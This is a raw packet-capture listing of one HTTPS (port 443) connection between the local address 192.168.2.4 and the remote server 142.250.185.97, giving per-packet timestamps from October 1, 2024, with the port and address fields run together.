                                                      Oct 1, 2024 07:43:06.249247074 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.249301910 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.249335051 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.249389887 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.250808001 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.250900030 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.250906944 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.251039982 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.252334118 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.252449036 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.252455950 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.252583027 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.253773928 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.253859043 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.253895044 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.254053116 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.255237103 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.255331039 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.255338907 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.255394936 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.256767035 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.256819963 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.256825924 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.256891012 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.256896973 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.256963968 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.258125067 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.258176088 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.258230925 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.258274078 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.259535074 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.259587049 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.259629965 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.259671926 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.261706114 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.261755943 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.261763096 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.261804104 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.263851881 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.263901949 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.263938904 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.263987064 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.264029026 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.264077902 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.264107943 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.264159918 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.268153906 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.268218994 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.268275976 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.268326998 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.268372059 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.268426895 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.268448114 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.268492937 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.268758059 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.268811941 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.274760962 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.274827957 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.274864912 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.274918079 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.274945021 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.274993896 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.275021076 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.275074959 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.275114059 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.275161982 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.275202036 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.275249958 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.281162977 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.281229019 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.281260967 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.281301975 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.281338930 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.281388998 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.281420946 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.281470060 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.281495094 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.281548023 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.285417080 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.285480022 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.285506010 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.285550117 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.285605907 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.285650015 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.285684109 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.285727978 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.285759926 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.285804033 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.285831928 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.285876036 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.291920900 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.291984081 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.292030096 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.292077065 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.292121887 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.292161942 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.292197943 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.292237997 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.292272091 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.292313099 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.292346001 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.292386055 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.297416925 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.297535896 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.297584057 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.297599077 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.297712088 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.297745943 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.297759056 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.297874928 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.305042982 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.305109978 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.305138111 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.305170059 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.305175066 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.305186033 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.305197954 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.305214882 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.305221081 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.305253983 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.305258989 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.305886030 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.309289932 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.309344053 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.309350014 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.309384108 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.309426069 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.309432030 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.309526920 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.309566021 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.309571028 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.309603930 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.316927910 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.317061901 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.317102909 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.317131996 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.317138910 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.317147970 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.317188978 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.320626020 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.320693970 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.320764065 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.320776939 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.320837021 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.320872068 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.320877075 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.320888996 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.320926905 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.324357986 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.324529886 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.324570894 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.324608088 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.324609041 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.324618101 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.324632883 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.324651003 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.324656010 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.324687958 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.331912994 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.331981897 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.332015038 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.332055092 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.332071066 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.332079887 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.332107067 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.332123041 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.332128048 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.332161903 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.335061073 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.335192919 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.335231066 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.335263968 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.335263014 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.335273027 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.335308075 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.335325956 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.335764885 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.337904930 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.339612007 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.339673996 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.339683056 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.339797974 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.339838028 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.339843035 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.339848995 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.339883089 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.339889050 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.341181040 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.344093084 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.344156981 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.344194889 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.344197989 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.344203949 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.344227076 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.344250917 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.344254971 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.344290018 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.344295979 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.344327927 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.349397898 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.349622965 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.349662066 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.349699974 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.349700928 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.349709034 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.349731922 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.349751949 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.349756956 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.349874020 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.352540016 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.352682114 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.352719069 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.352736950 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.352742910 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.352777958 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.352783918 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.352801085 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.352806091 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.352828026 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.352855921 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.356923103 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.356998920 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.357033968 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.357047081 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.357053041 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.357211113 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.357212067 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.357219934 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.357888937 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.363615036 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.363692045 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.363759995 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.363768101 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.363831043 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.363857985 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.363873005 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.363878012 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.363889933 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.363912106 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.363915920 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.363953114 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.374083996 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.374171019 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.374193907 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.374245882 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.374269962 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.374283075 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.377916098 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.377931118 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.380542994 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.380579948 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.380597115 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.380613089 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.380629063 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.380646944 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.380649090 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.380657911 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.380687952 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.380695105 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.382011890 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.386291981 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.386480093 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.386508942 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.386528969 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.386534929 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.386554956 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.386568069 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.386573076 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.386578083 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.386596918 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.386619091 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.393798113 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.393837929 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.393853903 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.393860102 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.393876076 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.393888950 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.393901110 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.393904924 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.393923044 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.393945932 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.394078016 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.397890091 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.397968054 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.398010015 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.398015022 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.398051023 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.398057938 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.398092985 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.398159027 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.398195982 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.398200989 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.398231983 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.398240089 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.398268938 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.405749083 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.405801058 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.405807972 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.405849934 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.405864000 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.405884981 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.405917883 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.405924082 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.405977011 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.406018019 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.406023979 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.406075954 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.409467936 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.409511089 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.409605980 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.409667015 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.409667015 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.409674883 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.409703970 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.409712076 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.409756899 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.409763098 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.409797907 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.412974119 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.413038015 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.413043022 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.413080931 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.413085938 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.413090944 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.413109064 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.413134098 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.413505077 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.413551092 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.413563013 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.413604021 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.420384884 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.420473099 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.420481920 CEST44349739142.250.185.97192.168.2.4
